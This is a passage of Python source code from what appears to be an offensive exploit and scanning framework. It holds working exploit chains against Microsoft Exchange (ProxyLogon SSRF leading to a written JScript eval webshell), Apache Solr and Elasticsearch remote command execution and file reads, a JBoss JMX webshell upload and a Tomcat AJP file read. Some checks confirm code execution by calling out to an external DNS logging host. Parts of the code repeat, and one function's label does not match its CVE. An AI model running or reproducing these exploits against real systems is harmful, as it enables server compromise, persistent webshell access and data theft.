<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
''' % mail
headers = {
'User-Agent': 'ExchangeServicesClient/0.0.0.0',
'Content-Type': 'text/xml'
}
r = __exploit(url,
name,
'/autodiscover/autodiscover.xml',
qs='',
data=payload,
headers=headers)
res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
if res:
headers = {
'X-Clientapplication': 'Outlook/15.0.4815.1002',
'X-Requestid': 'x',
'X-Requesttype': 'Connect',
'Content-Type': 'application/mapi-http',
}
legacyDN = res.group(1)
payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
r = __exploit(url,
name,
'/mapi/emsmdb/',
qs='',
data=payload,
headers=headers)
res = re.search('with SID ([S\-0-9]+) ', r.text)
if res:
return res.group(1)
else:
return False
else:
return False
def _parse_challenge(auth):
target_info_field = auth[40:48]
target_info_len = __unpack_int('H', target_info_field[0:2])
target_info_offset = __unpack_int('I', target_info_field[4:8])
target_info_bytes = auth[target_info_offset:target_info_offset +
target_info_len]
domain_name = ''
computer_name = ''
info_offset = 0
while info_offset < len(target_info_bytes):
av_id = __unpack_int(
'H', target_info_bytes[info_offset:info_offset + 2])
av_len = __unpack_int(
'H', target_info_bytes[info_offset + 2:info_offset + 4])
av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
av_len]
info_offset = info_offset + 4 + av_len
if av_id == 2: # MsvAvDnsDomainName
domain_name = __unpack_str(av_value)
elif av_id == 3: # MsvAvDnsComputerName
computer_name = __unpack_str(av_value)
#if r"-" in domain_name and r"-" in computer_name:
return domain_name, computer_name
#else:
# return False
def _get_email(url):
try:
url = get_fld(url)
return url
except:
return "unkonw"
try:
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
if bool(re.search(r'\d', self.url)):
try:
from urllib3.contrib import pyopenssl as reqs
x509 = reqs.OpenSSL.crypto.load_certificate(
reqs.OpenSSL.crypto.FILETYPE_PEM,
reqs.ssl.get_server_certificate(
(self.hostname, self.port)))
keys = reqs.get_subj_alt_name(x509)[0]
for k in keys:
MAIL = "administrator@" + _get_email("https://" + k)
except:
MAIL = "administrator@" + _get_email(self.url)
else:
MAIL = "administrator@" + _get_email(self.url)
# Getting ComputerName and DomainName
url = self.url + "/rpc/"
ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
r = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
# assert r.status_code == 401, "Error while getting ComputerName"
auth_header = r.headers['WWW-Authenticate']
auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
auth_header).group(1)
domain_name, computer_name = _parse_challenge(b64decode(auth))
# print('[*] Domain Name =', domain_name)
# print('[*] Computer Name =', computer_name)
NAME = computer_name
# get SID
sid = _get_sid(self.url, NAME, MAIL)
# print(sid)
payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
MAIL.split('@')[0], sid)
r = __exploit(self.url,
NAME,
'/ecp/proxyLogon.ecp',
qs='',
data=payload)
session_id = r.cookies.get('ASP.NET_SessionId')
canary = r.cookies.get('msExchEcpCanary')
# print('[*] get ASP.NET_SessionId =', session_id)
# print('[*] get msExchEcpCanary =', canary)
try:
extra_cookies = [
'ASP.NET_SessionId=' + session_id,
'msExchEcpCanary=' + canary
]
except:
extra_cookies = [
'ASP.NET_SessionId=' + str(session_id),
'msExchEcpCanary=' + str(canary)
]
# Getting OAB information
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/GetObject',
qs=qs,
data='',
cookies=extra_cookies)
try:
identity = r.json()['d']['Output'][0]['Identity']
# print('[*] OAB Name', identity['DisplayName'])
# print('[*] OAB ID ', identity['RawIdentity'])
except:
identity = False
if NAME and sid and session_id and canary and identity:
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = ntlm_type1
self.vul_info[
"prt_info"] = "[file write] [email:" + MAIL + "] [sid:" + sid + "] [oab-id:" + identity[
'RawIdentity'] + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_27065_exp(self, cmd, file, email):
vul_name = "Microsoft Exchange: CVE-2021-27065"
FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file
FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>'
def __unpack_str(byte_string):
return byte_string.decode('UTF-8').replace('\x00', '')
def __unpack_int(format, data):
return unpack(format, data)[0]
def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
cookies = list(cookies)
cookies.extend([
'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
])
if not headers:
headers = {'Content-Type': 'application/json'}
headers['Cookie'] = ';'.join(cookies)
headers['msExchLogonMailbox'] = 'S-1-5-20'
try:
r = requests.post(url + "/ecp/y.js",
headers=headers,
data=data,
verify=False,
allow_redirects=False)
return r
except:
return False
def _get_sid(url, name, mail):
payload = '''
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
''' % mail
headers = {
'User-Agent': 'ExchangeServicesClient/0.0.0.0',
'Content-Type': 'text/xml'
}
r = __exploit(url,
name,
'/autodiscover/autodiscover.xml',
qs='',
data=payload,
headers=headers)
res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
if res:
headers = {
'X-Clientapplication': 'Outlook/15.0.4815.1002',
'X-Requestid': 'x',
'X-Requesttype': 'Connect',
'Content-Type': 'application/mapi-http',
}
legacyDN = res.group(1)
payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
r = __exploit(url,
name,
'/mapi/emsmdb/',
qs='',
data=payload,
headers=headers)
res = re.search('with SID ([S\-0-9]+) ', r.text)
if res:
return res.group(1)
else:
return False
else:
return False
def _parse_challenge(auth):
target_info_field = auth[40:48]
target_info_len = __unpack_int('H', target_info_field[0:2])
target_info_offset = __unpack_int('I', target_info_field[4:8])
target_info_bytes = auth[target_info_offset:target_info_offset +
target_info_len]
domain_name = ''
computer_name = ''
info_offset = 0
while info_offset < len(target_info_bytes):
av_id = __unpack_int(
'H', target_info_bytes[info_offset:info_offset + 2])
av_len = __unpack_int(
'H', target_info_bytes[info_offset + 2:info_offset + 4])
av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
av_len]
info_offset = info_offset + 4 + av_len
if av_id == 2: # MsvAvDnsDomainName
domain_name = __unpack_str(av_value)
elif av_id == 3: # MsvAvDnsComputerName
computer_name = __unpack_str(av_value)
return domain_name, computer_name
def _get_email(url):
try:
url = get_fld(url)
return url
except:
return "unkonw"
try:
MAIL = email
print('[+] Test Email =', MAIL)
# Getting ComputerName and DomainName
url = self.url + "/rpc/"
ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
r = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
assert r.status_code == 401, "Error while getting ComputerName"
auth_header = r.headers['WWW-Authenticate']
auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
auth_header).group(1)
domain_name, computer_name = _parse_challenge(b64decode(auth))
print('[*] Domain Name =', domain_name)
print('[*] Computer Name =', computer_name)
NAME = computer_name
# get SID
sid = _get_sid(self.url, NAME, MAIL)
print('[*] Login sid =', sid)
payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
MAIL.split('@')[0], sid)
r = __exploit(self.url,
NAME,
'/ecp/proxyLogon.ecp',
qs='',
data=payload)
session_id = r.cookies.get('ASP.NET_SessionId')
canary = r.cookies.get('msExchEcpCanary')
print('[*] get ASP.NET_SessionId =', session_id)
print('[*] get msExchEcpCanary =', canary)
try:
extra_cookies = [
'ASP.NET_SessionId=' + session_id,
'msExchEcpCanary=' + canary
]
except:
extra_cookies = [
'ASP.NET_SessionId=' + str(session_id),
'msExchEcpCanary=' + str(canary)
]
# Getting OAB information
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/GetObject',
qs=qs,
data='',
cookies=extra_cookies)
try:
identity = r.json()['d']['Output'][0]['Identity']
print('[*] OAB Name', identity['DisplayName'])
print('[*] OAB ID ', identity['RawIdentity'])
except:
identity = False
print('[*] Setting up webshell payload through OAB')
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'ExternalUrl': 'http://f/' + FILE_DATA
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
if r.status_code == 200:
print('[*] Writing shell')
qs = urlencode({
'schema': 'ResetOABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'FilePathName': FILE_PATH
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
# Set-OABVirtualDirectory
print('[*] Cleaning OAB')
qs = urlencode({
'schema': 'OABVirtualDirectory',
'msExchEcpCanary': canary
})
payload = json.dumps({
'identity': {
'__type': 'Identity:ECP',
'DisplayName': identity['DisplayName'],
'RawIdentity': identity['RawIdentity']
},
'properties': {
'Parameters': {
'__type':
'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
'ExternalUrl': ''
}
}
})
r = __exploit(self.url,
NAME,
'/ecp/DDI/DDIService.svc/SetObject',
qs=qs,
data=payload,
cookies=extra_cookies)
up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file
self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore')
verify.exploit_print(up, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_26855_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
self.vul_info["vul_numb"] = "CVE-2021-26855"
self.vul_info["vul_apps"] = "Exchange"
self.vul_info["vul_date"] = "2021-03-03"
self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
self.vul_info["cre_date"] = "2021-03-07"
self.vul_info["cre_auth"] = "zhzyker"
url = self.url + "/owa/auth/x.js"
dns = dns_request()
cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace(
"localhost", dns)
try:
headers = {
"User-agent": self.ua,
"Cookie": cookie_dns,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
"Cookie"] + "]"
else:
headers = {
"User-agent": self.ua,
"Cookie": cookie_local,
"Connection": "close"
}
res = requests.get(url,
headers=headers,
timeout=self.timeout,
verify=False)
if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text:
if r"TargetUnknown" in res.text and r"localhost" in res.text:
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = headers["Cookie"]
self.vul_info[
"prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
"Cookie"] + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0318_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: time-2021-03-18"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = ""
self.vul_info["vul_name"] = "Apache Solr Arbitrary file reading"
self.vul_info["vul_numb"] = "time-2021-03-18"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2021-03-17"
self.vul_info["vul_vers"] = "all"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Arbitrary file read"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Arbitrary file read"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
set_property = self.url + "/solr/" + str(core_name) + "/config"
headers_json = {
'Content-Type': 'application/json',
'Connection': 'colse',
'User-Agent': self.ua
}
data = r'''{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'''
r = requests.post(set_property,
data=data,
headers=headers_json,
timeout=self.timeout,
verify=False)
if r.status_code == 200 and r"responseHeader" in r.text:
rce_url = self.url + "/solr/" + str(
core_name) + "/debug/dump?param=ContentStreams"
headers = {
'User-Agent':
self.ua,
'Connection':
'colse',
'Content-Type':
'multipart/form-data; boundary=------------------------e602c3e1a193d599'
}
data = '--------------------------e602c3e1a193d599\r\n'
data += 'Content-Disposition: form-data; name="stream.url"\r\n'
data += '\r\n'
data += 'file:///etc/passwd\r\n'
data += '--------------------------e602c3e1a193d599--\r\n'
req = requests.post(rce_url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if r"root:x:0:0:root" in req.text and r"/root:/bin/bash" in req.text and r"/usr/sbin/nologin" in req.text:
if r"daemon:" in req.text and req.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[file read] [os:linux] [corename: " + self.url + "/solr/" + core_name + " ]"
else:
data = '--------------------------e602c3e1a193d599\r\n'
data += 'Content-Disposition: form-data; name="stream.url"\r\n'
data += '\r\n'
data += 'file:///C:windows/win.ini\r\n'
data += '--------------------------e602c3e1a193d599--\r\n'
req = requests.post(rce_url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if r"app support" in req.text and r"fonts" in req.text and r"mci extensions" in req.text:
if r"files" in req.text and req.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(
req).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[file read] [os:windows] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_0193_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2019-0193"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2019-10-16"
self.vul_info["vul_vers"] = "< 8.2.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
"在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
md = random_md5()
cmd = "echo " + md
payload = self.payload_cve_2019_0193.replace("RECOMMAND",
quote(cmd, 'utf-8'))
solrhost = self.hostname + ":" + str(self.port)
headers = {
'Host': "" + solrhost,
'User-Agent': self.ua,
'Accept': "application/json, text/plain, */*",
'Accept-Language':
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
'Accept-Encoding': "zip, deflate",
'Referer': self.url + "/solr/",
'Content-type': "application/x-www-form-urlencoded",
'X-Requested-With': "XMLHttpRequest",
'Connection': "close"
}
urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(urlcore,
headers=headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
urlconfig = self.url + "/solr/" + str(
core_name) + "/admin/mbeans?cat=QUERY&wt=json"
request = requests.get(urlconfig,
headers=headers,
timeout=self.timeout,
verify=False)
url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
request = requests.post(url_cmd,
data=payload,
headers=headers,
timeout=self.timeout,
verify=False)
if request.status_code == 200 and core_name != "null":
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [core name:" + url_cmd + "] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2015_1427_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Elasticsearch: CVE-2015-1427"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2015_1427.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2015-1427"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2015-01-31"
self.vul_info["vul_vers"] = "< 1.3.7, < 1.4.3"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "命令执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Elasticsearch 1.3.8之前的Groovy脚本引擎和1.4.3之前的1.4.x中的Groovy脚本引擎允许远程攻击" \
"者绕过沙盒保护机制,并通过精心制作的脚本执行任意shell命令。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
md = random_md5()
cmd = "echo " + md
self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
self.host = self.hostname + ":" + str(self.port)
self.headers_text = {
'Host': "" + self.host,
'Accept': '*/*',
'Connection': 'close',
'Accept-Language': 'en',
'User-Agent': self.ua,
'Content-Type': 'application/text'
}
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers_text,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
except:
self.r = "null"
if md in self.r:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2017_12629_poc(self):
self.threadLock.acquire()
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-12629"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2017-10-14"
self.vul_info["vul_vers"] = "< 7.1.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
"(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
new_core = random_md5()
md = random_md5()
cmd = "ping " + md + "." + self.ceye_domain
payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", cmd).replace("new_core", new_core)
payload2 = '[{"id": "test"}]'
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
headers_solr1 = {
'Accept': "*/*",
'User-Agent': self.ua,
'Content-Type': "application/json"
}
headers_solr2 = {
'Host': "localhost",
'Accept-Language': "en",
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/json"
}
try:
request = requests.get(url_core,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
req = requests.post(self.url + "/solr/" + str(core_name) +
"/config",
data=payload1,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
if r"xxxxxx" in self.ceye_domain: # 特征判断
if request.status_code == 200 and core_name != "null" and core_name is not None:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"prt_info"] = "[maybe] [new core:" + new_core + "] "
verify.scan_print(self.vul_info)
else:
request = requests.post(self.url + "/solr/" + str(core_name) +
"/update",
data=payload2,
headers=headers_solr2,
timeout=self.timeout,
verify=False)
request = requests.get(self.ceye_api + self.ceye_token)
if md in request.text:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ceye] [new core:" + new_core + "] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2010_0738_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-0738"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "JBoss JMX控制台安全验证绕过漏洞"
self.vul_info["vul_numb"] = "CVE-2010-0738"
self.vul_info["vul_apps"] = "JBoss"
self.vul_info["vul_date"] = "2014-03-21"
self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "任意文件上传"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "CVE-2010-0738漏洞利用了HTTP中HEAD请求方法,绕过了对GET和POST请求的限制," \
"成功地再次利用jboss.admin -> DeploymentFileRepository -> store()方法上传文件。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
self.path = "/jmx-console/HtmlAdaptor"
md = random_md5()
self.data = md
self.poc = (
"?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" +
self.data + "&argType=boolean&arg4=True")
self.exp = (
"?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=" + self.name +
".war&argType=java.lang.String&arg1=" + self.name + "&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" +
self.jsp_webshell + "&argType=boolean&arg4=True")
self.headers = {
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': self.ua,
"Connection": "keep-alive"
}
try:
self.req = requests.head(self.url + self.path + self.poc,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.request = requests.get(self.url + "/shells/shells.jsp",
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.head(self.url + self.path + self.poc,
headers=self.headers,
timeout=self.timeout,
verify=False)
time.sleep(0.5)
self.request = requests.get(self.url + "/shells/shells.jsp",
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(self.request.text,
md) and self.request.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = self.poc
self.vul_info[
"prt_info"] = "[jmx-console] [upload: " + self.url + "/shells/shells.jsp ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_1938_exp(self, file):
vul_name = "Apache Shiro: CVE-2016-4437"
headers = self.headers
self.output_method = "ajp"
self.default_port = self.port
self.default_requri = '/'
self.default_headers = {}
self.username = None
self.password = None
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.request = "null"
raw_data = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
">_< So there is no HTTP protocol request and response"
try:
socket.setdefaulttimeout(self.timeout)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((self.hostname, self.default_port))
self.stream = self.socket.makefile("rb",
buffering=0) # PY2: bufsize=0
self.attributes = [
{
'name': 'req_attribute',
'value': ['javax.servlet.include.request_uri', '/']
},
{
'name': 'req_attribute',
'value': ['javax.servlet.include.path_info', file]
},
{
'name': 'req_attribute',
'value': ['javax.servlet.include.servlet_path', '/']
},
]
method = 'GET'
self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
self,
self.hostname,
self.default_requri,
method=AjpForwardRequest.REQUEST_METHODS.get(method))
if self.username is not None and self.password is not None:
self.forward_request.request_headers[
'SC_REQ_AUTHORIZATION'] = "Basic " + str(
("%s:%s" % (self.username, self.password)
).encode('base64').replace("\n"
""))
for h in self.default_headers:
self.forward_request.request_headers[h] = headers[h]
for a in self.attributes:
self.forward_request.attributes.append(a)
self.responses = self.forward_request.send_and_receive(
self.socket, self.stream)
if len(self.responses) == 0:
return None, None
self.snd_hdrs_res = self.responses[0]
self.data_res = self.responses[1:-1]
self.request = (b"".join([d.data for d in self.data_res]).decode())
verify.exploit_print(self.request, raw_data)
except socket.timeout:
verify.timeout_print(vul_name)
except Exception as error:
verify.error_print(vul_name)
def cve_2010_1428_poc(self):
self.threadLock.acquire()
